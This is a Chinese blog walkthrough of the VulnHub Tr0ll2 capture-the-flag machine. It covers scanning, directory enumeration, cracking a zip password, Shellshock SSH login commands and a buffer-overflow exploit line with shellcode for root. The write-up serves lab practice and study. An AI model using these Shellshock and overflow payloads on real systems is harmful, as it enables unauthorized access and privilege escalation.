zoukankan      html  css  js  c++  java
  • vulnhub靶场-Tr0ll2解题思路

    靶机地址:https://download.vulnhub.com/tr0ll/Tr0ll2.rar
    靶机难度:中等(CTF)
    靶机发布日期:2014年10月24日
    靶机描述:Tr0ll系列VM中的下一台计算机。这比原始的Tr0ll难度有所提高,但是解决所需的时间大致相同,并且没有错,巨魔仍然存在!
    目标:得到root权限&找到proof.txt
    作者:cool
    时间:2021/2/24

    解题使用工具:

     nmap、fcrackzip、searchsploit、base64、dirb、wget、

    解题过程:

    1.使用nmap扫描器,探测靶机地址:

     2.主页代码中发现作者为Tr0ll可以账号

     3.尝试使用Tr0ll登录系统,尽然成功了,并且获得一个压缩包lmao.zip

     4.此压缩包需要密码,才能解压。使用John进行爆破未成功,所以使用dirb工具扫描主站的目录,并且有新的地址发现。

     

     

    5.由于每个都需要打开一遍太过麻烦,所以使用其他方式进行打开

    6.浏览每一个目录之后,得到都是一样的图片。只在http://192.168.8.102/dont_bother/cat_the_troll.jpg查找到不同的编码方式,通过cat/tail查看文件编码方式,找到一句话Look Deep within y0ur_self for the answer

     7.通过浏览http://192.168.8.102/y0ur_self/目录发现answer.txt

     8.打开发现是一个base64的加密文档,使用kali自带的base64工具解密输出到guo.txt文件

     

    9.使用fcrackzip工具进行暴力破击lmao.zip压缩包,得到密码:ItCantReallyBeThisEasyRightLOL

     10.解密出结果为noob私钥文件,尝试枚举ssh用户名,发现为noob

     

    ssh用户名枚举,确定用户名为noob

     11.尝试使用noob用户和noob私钥文件登录靶机

    成功登录ssh三种方式:

    链接:https://unix.stackexchange.com/questions/157477/how-can-shellshock-be-exploited-over-ssh

    ssh noob@192.168.8.102 -i noob -t "() { :; }; /bin/bash"
    ssh -i noob noob@192.168.8.102 -t "() { :; }; /bin/bash"
    ssh -i noob 192.168.8.102 -l noob -t "() { :; }; /bin/bash"

     

     12.查看特权用户:

     13.提权(缓冲区溢出),door2/r00t文件存在缓冲区溢出。

    shellcode:http : //shell-storm.org/shellcode/files/shellcode-827.php

    使用到的exp:
    ./r00t $(python -c 'print "A"*268 + "x80xfbxffxbf" + "x90"*16 + "x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1xb0x0bxcdx80"')

  • 相关阅读:
    jvm003-运行时数据区及程序计数器
    jvm002-类加载子系统
    jvm001-JVM与Java体系结构
    (四十三)常用 10 种算法——马踏棋盘算法
    (四十二)常用 10 种算法——弗洛伊德算法
    node 环境配置
    cordova platform add android报错问题处理
    WPF代码引用Resouces中的图片
    WPF中利用WebClient向服务器上传文件
    未能加载文件或程序集“COM.Excel”或它的某一个依赖项
  • 原文地址:https://www.cnblogs.com/coolguo/p/14438925.html
Copyright © 2011-2022 走看看